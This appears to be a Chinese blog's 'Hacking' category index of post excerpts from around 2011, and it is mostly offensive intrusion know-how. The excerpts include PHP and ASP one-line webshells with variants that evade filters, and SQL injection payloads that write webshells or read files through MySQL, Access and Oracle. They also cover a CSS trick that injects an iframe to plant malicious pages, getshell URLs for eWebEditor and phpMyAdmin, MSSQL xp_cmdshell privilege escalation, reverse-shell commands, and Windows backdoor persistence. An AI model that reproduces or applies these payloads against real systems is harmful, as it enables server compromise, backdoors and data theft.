Hacking
文章平均质量分 75
7禧
这个作者很懒,什么都没留下…
展开
-
windows中常见后门持久化方法总结
前言当我们通过各种方法拿到一个服务器的权限的时候,我们下一步要做的就是后渗透了,而后门持久化也是我们后渗透很重要的一部分,下面我来总结一下windows下常见的后门持久化的方法后门持久化我的操作环境是:无AV、管理员权限(提权、免杀等是后门持久化的铺垫,当然有的方法也并不是全部需要这些铺垫) 操作系统:win7,windows server 2008R2,xpshift后门...转载 2019-11-13 12:38:36 · 1752 阅读 · 2 评论 -
lcx不能转发ftp解决
<br />上次搞一个站的时候,用的FileZilla提权,当时挺郁闷的。用的lcx把FileZilla的端口发出来了,用户也加了,结果ftp搞死搞活愣是发不出来,想用别的工具转发一下,结果一时没搞到免杀的。当时用的是写了个bat直接在webshell上执行了,算是提权了。后来想想着下次可能会有类似的情况呢,于是写了这个东西。<br /><br />我没看过lcx的源码~所以不知道为什么它不能转发ftp<br />下面是我自己写的一个lcx,姑且叫做mylcx吧 !<br /><br />(另外我还弄了一个原创 2011-01-24 00:02:00 · 815 阅读 · 0 评论 -
SQL注入Access导出WebShell
已经听N个人过说有人已经发现SQL注入Access得到webshell的技术了,也只是听说而已,具体的细节还是不得而知。最近在看的书中一章提到Jet的安全,然后灵光一闪,呵呵,发现了一种可以利用access导出asp的方法,分享之。几个月之前网上就流传利用SQL注入Access导出数据库内容到文本文件(可导出txt、htm、html等格式)的方法:SELECT * into [test.txt] in 'd:/web/' 'text;' from admin执行上述语句,在d:/web目录下就会生成test转载 2011-01-25 12:48:00 · 725 阅读 · 0 评论 -
CSS挂马代码的方法
<br />网上流行的: <br />body <br />{ <br />background-image: url('javascript:document.write("<Iframe src=http://192.168.0.5/test.htm width=0 height=0></iframe>")') <br />} <br />//此方法会使主页不正常.返回一片空白. <br />用弹窗. <br />body <br />{ <br />background-image: url('jav原创 2011-02-24 16:50:00 · 652 阅读 · 0 评论 -
Oracle本地读写文件---Ora Write Webshell
<br />一般我们通过函数注射以后 获得ORA的DBA权限 那么我们就得对本地文件进行操作!要是WEB跟ORA是同一个机器~那就更方便于我们拿更多的权限了~或者对本地写webshell <br /><br />下面是采用ORA 自带的文件访问包 操作本地文件! 前提是你必须要知道WEBSITE的物理地址 <br /><br />以下是一个简单例子 <br /><br />--首先我们得先建立一个 ORACLE的目录对象 指向 C:/ <br /><br />create or replace direct原创 2011-01-29 20:59:00 · 1193 阅读 · 0 评论 -
1433恢复,删除xp_cmdshell及修补sa弱口令命令
<br /><br />create procedure sp_addextendedproc --- 1996/08/30 20:13<br />@functname nvarchar(517),/* (owner.)name of function to call */<br />@dllname varchar(255)/* name of DLL containing function */<br />as<br />set implicit_transactions off<br />if @@t原创 2011-02-20 23:00:00 · 835 阅读 · 0 评论 -
ewebeditor 2.8 后台插马
<br /><br />ewebeditor 2.8 后台插上一句话<br />影响版本:2.8 商业版<br />攻击利用:登陆后台,点击修改密码—新密码设置为 1″:eval request(“a”)’<br />设置成功后,访问http://www.tmdsb.com/ewebeditor/asp/config.asp文件即可,<br />一句话木马被写入到这个文件里面了.原创 2011-03-11 23:32:00 · 734 阅读 · 0 评论 -
开启mysql root外连
<br /><br />如果遇到了 服务器开启了 3306 端口,但是不允许root外连的情况,<br />我们可以在shell里面执行如下的语句来开启root用户的外连,方便我们提权。<br /> GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY 'root密码' WITH GRANT OPTION;原创 2011-03-11 23:37:00 · 646 阅读 · 0 评论 -
Mysql暴错注入代码
<br />MySql Error Based Injection Reference<br />[Mysql暴错注入参考]<br />Author:Pnig0s1992<br />Blog:http://pnig0s1992.blog.51cto.com/<br />TeAm:http://www.FreeBuf.com/<br />Mysql5.0.91下测试通过,对于5+的绝大部分版本可以测试成功<br />小部分版本使用name_const()时会报错.可以用给出的Method.2测试<br />查原创 2011-03-11 23:39:00 · 747 阅读 · 0 评论 -
PhpMyadmin最新拿WEBshell
<br /><br />在无权执行SQL命令导出一句话或者导出出错的情况下用它试试吧。<br />利用代码 :<br />http://www.tmdsb.com/phpMyAdmin/sql.php?db=test&table=<br />a&printview=1&sql_query=select%20cmd%20from+a%20into%20outfile<br />%20′E://test1.php’;&display_text=F&token=dc49fb24f86a6dc2b996b5d421原创 2011-03-11 23:41:00 · 719 阅读 · 0 评论 -
域渗透
很多时候我们在渗透的时候几乎都在内网旁注等xx操作,但是你知道吗,其实很多时候我们都进入了一个域,但你知道怎么进行域渗透吗?这里秒杀将为你科普下!首先还是先简要看一下域的概念吧:域 (Domain) 是Windows网络中独立运行的单位,域之间相互访问则需要建立信任关系(即Trust Relation)。信任关系是连接在域与域之间的桥梁。当一个域与其他域建立了信任关系后,2个域之间不但可以按需要相互进行管理,还可以跨网分配文件 和打印机等设备资源,使不同的域之间实现网络资源的共享与管理。原创 2011-03-11 23:54:00 · 1000 阅读 · 0 评论 -
arpsf 嗅探使用
<br /><br />================================================================================<br /> ArpCheatSniffer V1.0<br /> Powered by shadow @2005/5/8<br /> my web:http://www.codehome.6600.org<br />原创 2011-03-11 23:45:00 · 1052 阅读 · 0 评论 -
安全的使用带后门的webshell
<br /><br />在网上下的WEBSHELL几乎大部分存在后门。这样的话你辛辛苦苦拿下的站。同时也免费的送人了。<br />一般的人也很难解密。无法去除后门。现在给出一种最简单的方法。不要去除后门。照样用。放后门<br />者无法使用。当然要是WEBSHELL作者在里面放了万能密码的话。这招貌似无效。<br />万能密码也是本代码。呵。挺搞笑。<br />代码挺简单的。如下:<br />在webshell的最前面插入:<br /><%if request(“tmdsb”)=”250″ then %><原创 2011-03-12 00:31:00 · 902 阅读 · 0 评论 -
oldjun 检测网站的经验
<br /><br /> <br />1.无论什么站,无论什么语言,我要渗透,第一件事就是扫目录,最好一下扫出个上传点,直接上传shell,诸位不要笑,有时候你花很久搞一个站,最后发现有个现成的上传点,而且很容易猜到,不过这种情况发生在asp居多!<br />2.asp(aspx)+MSSQL先考虑注入,一般的注入都有DBowner权限可以直接写shell;如果写不了,或者web与数据库分离,那就猜数据,从后台下手了,后台可以上传或者改配置文件;<br />3.asp(aspx)+ACCESS拿shell一原创 2011-03-14 17:49:00 · 682 阅读 · 0 评论 -
linux下用webshell修改文件权限
<br /><br />当我们拥有了一个linux下的shell(服务器上多个网站)。<br />这个shell对所在站点的根目录有可写入权限,甚至能查看其他网站的目录。<br />那么,这样的主机设置肯定是不安全的。<br />有的时候,我们想对获得同服务器的其他站的权限,比如直接对其他站点的index.php进行修改,却发现没有权限。<br />我们可以尝试通过以下脚本来实现对其他站点的文件添加权限。<br />代码:<br /><?php<br />$path = stripslashes($_GET原创 2011-03-19 15:15:00 · 689 阅读 · 0 评论 -
很多黑阔的密码
<br /><br />组超强功能修正去后门加强S-U提权版 密码hkk007<br />火狐ASP木马(超强版)” 华夏五周年庆典版 密码wrsk<br />**(中国数据) 密码rinima<br />asp 黑客→kissy 密原创 2011-03-18 22:06:00 · 1319 阅读 · 0 评论 -
利用系统保留文件名创建无法删除的webshell
<br /><br />Windows 下不能够以下面这些字样来命名文件/文件夹,包括:“aux”,“com1”“com2”“prn”“con”和“nul”等,但是通过cmd下是可以创建此类文件夹的,使用copy命令即可实现:<br />D:/wwwroot>copy rootkit.asp //./D://wwwroot/aux.asp<br />已复制 1 个文件。<br /> <br />D:/wwwroot>dir<br /> 驱动器 D 中的卷没有标签。<br /> 卷的序列号是原创 2011-03-19 15:14:00 · 511 阅读 · 0 评论 -
ASP .NET PHP 注入页面构造
<br /><br />Mssql:<br /><!--#include file="conn.asp"--> <br /><% <br />hid=request.QueryString("id") <br />sql="select * from admin where id="&hid <br />set rs=conn.execute (sql) <br />%><br />Access:<br /><% <br />db="aspzhuru.mdb"'这里修改数据库路径或名称 <br />Set原创 2011-03-19 15:16:00 · 459 阅读 · 0 评论 -
反弹先锋Win32.ConnectBackShell
<br /><br />Connect back shell golds7n version<br />bc <ip> <port> [shell]<br /><br />用法: bc ip地址 端口 cmd路径(可选项)<br /><br />远程机器执行:<br />bc 10.10.88.88 21 c:/windows/system32/msdtc/cmd.exe<br /><br />本机:<br />C:/Documents and Settings/Administrator>nc原创 2011-03-19 15:37:00 · 648 阅读 · 0 评论 -
discuz x1.5 discuz 7.2 后台getshell 0day通杀版出来
<br />discuz x1.5 discuz 7.2 后台getshell 0day通杀版,不知海浪做好防御没有~~~<br /><br /><br />附上 <br />从Discuz!古老的6.0版本开始,漏洞都出现在扩展插件上,利用方式有所不同,下面开始。<br />一 Discuz! 6.0 和 Discuz! 7.0<br />既然要后台拿Shell,文件写入必看。<br />/include/cache.func.php<br /><br />往上翻,找到调用函数的地方.都在updateca原创 2011-03-20 21:16:00 · 2526 阅读 · 0 评论 -
serv-u8 本地提权
<br /><br />受影响系统:serv-u8<br />不受影响系统:其他版本不受影响<br />描述:<br />看cnbeta发现su出8这个版本了。<br />想想以前写过一个7的本地提权。<br />不知道8有什么安全方面的更改。<br />下载来研究下,发现居然还是可以提权的,只是su7的那个不能直接用,稍微修改了下执行的流程。<br /> Su8的管理平台是http的,继承了su7的方式。<br /> 抓包,分析,发现了以下路程是可以利用的。<br /> 1, 管理员从管理控制台打开web原创 2011-03-17 19:09:00 · 830 阅读 · 0 评论 -
渗透技巧总结
<br /><br />本着共享之精神,方便各位黑阔童鞋,发表此文,希望抛砖引玉,童鞋们踊跃发言。使之更加完善,在交流中进步,形成良好的互动~<br /><br />旁站路径问题<br />1、读网站配置。<br />2、用以下VBSOn Error Resume NextIf (LCase(Right(WScript.Fullname,11))="wscript.exe") Then Msgbox Space(12) & "IIS Virtual Web Viewer" & Space(1原创 2011-05-10 02:26:00 · 1537 阅读 · 0 评论 -
星外提权目录
<br />有好多目录是可读可写可执行命令的<br />C:/Documents and Settings/All Users/Application Data/Microsoft/Media Index/<br />C:/php/PEAR/<br />C:/Program Files/Zend/ZendOptimizer-3.3.0/ <br />C:/Program Files/Common Files/有的杀毒 防火墙目录有权限<br />C:/7i24.com/iissafe/log/ 不原创 2011-05-13 17:48:00 · 945 阅读 · 0 评论 -
MSSQL SA错误提权集锦
<br /> 在webshell提权过程中使用MSSQL的SA账号来提升权限拿服务器是比较有效的方法,但是在我们得到SA账号的密码去执行系统命令的时候往往会遇到各类错误提示,无法正常执行系统命令。很多菜鸟朋友们遇到类似的问题可能就会选择放弃,其实这类问题是很常见的,现在管理员安全意识有所提高,往往对SA账号做了限制,或者是对我们执行系统命令所需要的xp_cmdshell储存过程做了修改或者删除,这个xp_cmdshell就类似于我们的wscript.shell一样了,有时候遇到管理将该组件删除了的我们自己原创 2011-05-15 20:06:00 · 946 阅读 · 0 评论 -
不改文件名的情况下上传突破
<br /><br />方法不错,首先就是不强制改上传文件名。还有就是上传目录没有执行的权限。<br />然后用这方法貌似就可以上传到上级可写目录了。<br />比如抓这是抓的上传数据包:<br />POST /upload/upfile.asp HTTP/1.1<br />Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel,原创 2011-03-28 17:20:00 · 650 阅读 · 0 评论 -
Mssql Public权限列目录
<br />注入点执行<br />aaa.com/xxx.asp?id=123;create table %23%23dhtemq (list int not null identity (1,1), dirtree nvarchar(500),num1 nvarchar(500),num2 nvarchar(500))<br />注入点执行<br />aaa.com/xxx.asp?id=123;insert into %23%23dhtemq(dirtree,num1,num2) exec master原创 2011-03-31 22:56:00 · 730 阅读 · 0 评论 -
N点主机管理系统密码解密代码程序
<br />2010年12月20日 星期一 07:22<br /><br />之前有写过<N点主机管理系统漏洞利用与防御措>的文章,那个我感觉其实也不算是漏洞吧.<br />这次在发个N点主机管理系统的加密密码解密漏洞利用代码程序吧,呵呵.<br />首先得了解下N点主机管理系统的密码加密可并非是cmd5等加密方式加密的.<br />即使用<N点主机管理系统漏洞利用与防御措>里介绍的办法登陆了管理系统的后台也是拿不下服务器的.<br />在N点主机管理系统下想获得服务器的权限也就是利用数据库里保存的sa帐号原创 2011-03-31 23:10:00 · 1571 阅读 · 0 评论 -
手工注入大全学习手册
<br /><br />手工注入大全<br />1.判断有无注入点<br />‘ ; and 1=1 and 1=2<br />2.猜表: 常见的表:admin adminuser user pass password 等..<br />and 0<>(select count(*) from *)<br />and 0<>(select count(*) from admin) —判断是否存在admin这张表<br />3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个<br原创 2011-03-31 23:18:00 · 673 阅读 · 0 评论 -
一句话木马及几种可绕过过滤格式
<br /><br />ASP一句话<br /> <br />1.<%eval request("YouPass")%><br /> <br />2. <%executerequest("YouPass")%><br /> <br />3. <%execute(request("YouPass"))%><br /> <br />免杀大部分网站的一句话<br /> <br />4.<% set ms = server.CreateObject("MSScriptControl.ScriptControl.1"原创 2011-04-12 23:59:00 · 3904 阅读 · 0 评论 -
巧妙利用表自联偏移注入ACC数据库拿webshell(图)
<br />今天下午一朋友丢来一个网站说喜欢这个网站的源码,看能不能拿下,拿下以后说请我去腐败腐败。既然他都开口了,嘿嘿我还正愁没机会狠狠的蹭他几下,谁知道他自己找上门来了,不蹭白不蹭。先打开主站,用的是个通用防注入系统,过滤的很严格,对get跟post都进行了严格的参数过滤,转换编码格式也没能绕过注入系统,cookie注入也没能成功。后台也不能登陆,看来只能用旁注了。(如果有哪位大牛能突破这个通用防注入系统的话,不防发出来大家共享一下。)又拿出AK48,推荐一下这个工具,觉得比旁注王要好用一点,先有AK4转载 2011-04-25 18:40:00 · 1051 阅读 · 0 评论 -
MYSQL注入中load_file()函数的进一步应用
<br /><br />文章已发表于《黑客防线》2008年第11期 转载请注明<br /> <br />MYSQL注入中,load_file()函数在获得webshell以及提权过程中起着十分重要的作用,常被用来读取各种配置文件,如:<br />/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件<br />/usr/local/apache2/conf/httpd.conf<br />/usr/local/app/apache2/conf/extra原创 2011-04-29 02:44:00 · 620 阅读 · 0 评论 -
php网站mysql load_file/outfile与多语句注入总结
1.outfile后面不能接0x开头或者char转换以后的路径,只能是单引号路径。这个问题在php注入中更加麻烦,因为会自动将单引号转义成/,那么基本没的玩了。唯一的一种可能就是你使用mysql远程连接,然后直接在mysql中执行命令,就没有查询限制了。当然,你要是找到了phpmyadmin,也可以。 2.load_file,后面的路径可以是单引号、0x、char转换的字符。这而记得原创 2011-06-21 13:40:00 · 754 阅读 · 0 评论 -
星外虚拟主机提权拿服务器
星外虚拟主机提权拿服务器 2011-04-24 12:37星外虚拟主机提权拿服务器 本次是对自己的IDC服务器的一次友情检测。本来服务器就已经拿了N次了。漏洞一直都放在那里。结果总有人拿到权限就炫耀。至于吗、?我本来就打算去换空间去了。 (还有仇家格我站,技术差我还不说什么。还到我面前吹,我承认自己服务器安全做的不好,你炫耀个撒。写出文章。给大家转载 2011-06-18 23:10:00 · 2335 阅读 · 0 评论 -
SQL注入直接修改管理员密码的MD5值
经常拿站的黑阔们一定经常碰到,某个网站有注入,管理员帐号和密码多暴出来了。可是密码是MD5加密的。而且在线的MD5解密不了。你说咋办?今天俺就整了个新方法,直接修改管理员密码的MD5值。然后进后台!(当然是有条件的。MSSQL)测试如下:http://www.tmdsb.com/news.asp?id=121在地址后输入单引号,显示Microsoft OLE DB原创 2011-06-27 14:07:00 · 2773 阅读 · 1 评论 -
PHP盲注常用语句
整理了一些盲注语句,有时候搞站的时候用的着。希望对大家也有用,大牛小牛们用的着就尽管拿吧。判断版本号:http://www.tmdsb.com/tmd.php?id=352&wsid=1%20and%20(1,1)%3E(select%20count(*),concat((select%20@@version%20),0x3a,floor(rand()*2))%原创 2011-06-27 15:02:00 · 1257 阅读 · 0 评论 -
利用脚本和命令绕过系统权限添加账号
<br />有时候一些人对服务器的添加用户的NET和NET1权限做了限制,让很多菜鸟朋友们望而止步。其实个人感觉遇到这个问题都很容易解决的,在此我也共享出我的方法给大家。<br /><br />cmd命令删除net和net1文件。一般删除之后系统会自动恢复文件,恢复的时候权限是系统重新默认的。大家就可以引用下面这段命令<br /><br />1:del C:/WINDOWS/system32/net.exe<br /><br />2:del C:/WINDOWS/system32/net1.exe<br /转载 2011-05-08 01:26:00 · 841 阅读 · 0 评论 -
webshell路径中带分号点号如.asp,.asa,.cdx,.cer的访问方法总结
<br />1.比如一个网马的url地址路径http://www.xxx.com/aa.asp/1.txt<br /><br />那么输入web木马密码后,提交到的页面是http://www.xxx.com/aa.asp,直接报404找不到,郁闷吧。<br /><br />其实看下webshell的form的action,明显是去掉了后面1.txt。<br /><br />解决办法就是将网么登录界面的htm存下来,改下form中的路径为全路径(包括http的地址及后面1.txt),再手工提交。<br /><原创 2011-05-08 01:35:00 · 1160 阅读 · 0 评论 -
网站后台备份自动备份成ASA格式却并不解析拿Shell方法
<br /><br />拿下一个网站的账号密码。进了后台后发现有备份。高兴ing<br />上传一个JPG格式的马儿。找到路径。备份确出现了<br /><br /><br />满以为会想其他站一样的成功,因为在通常情况下asa解析出来和asp差不多。确不然,因为网站再设置的时候删除了asa cer 等其他映射,只保留了html和asp的映射,但是这里确将备份文件后缀改为asa,这时候访问的时候是不会出现常见的黑屏(后门马儿)。图如下:<br /><br />怎么突破了,在网上也没找到资料。于是自己研究了下,原创 2011-05-08 01:40:00 · 647 阅读 · 0 评论 -
MYSQL提权新方法ROOT密码查找
<br />记得 昨天在入侵一个网站PHP+MYSQL<br />主站没办法进去 旁吧! OK 那就旁 在日下了一个旁站 当然想到的是提权<br />仔细看了下 权限小得可怜 只有一个E:/MYSQL5 和网站目录[支持PHP] 可浏览<br />其他权限基本没有[可能我太菜 没找到]<br />实在没办法了` 想到原来做网站时候MY SQL 数据存储的过程!知道了`<br />于是进入E:/MYSQL5/DATA 这个文件里面 找到MYSQL 这个文件夹<br />把里面的USER 表[有3个] 把3个全原创 2011-05-08 01:44:00 · 1048 阅读 · 0 评论 -
1433终极入侵之沙盒模式
<br />1433好扫,但是难入侵啊! <br /><br />不是127错误,就是命令被禁用。 不是缺少哪个DLL文件,就是126错误。<br /><br />哈,甚至连映像劫持、asshell、jobshell、seshell全部都使用不了,甚至SQL语句读写注册表都不行,该如何办?<br /><br />或许你忽略了一招你们忘记了沙盒模式的威力。其实很多人也知道沙盒模式,但是没有深究。所以忽视了它。<br /><br />下面我介绍它:<br /><br />select * from openro原创 2011-05-08 01:52:00 · 821 阅读 · 0 评论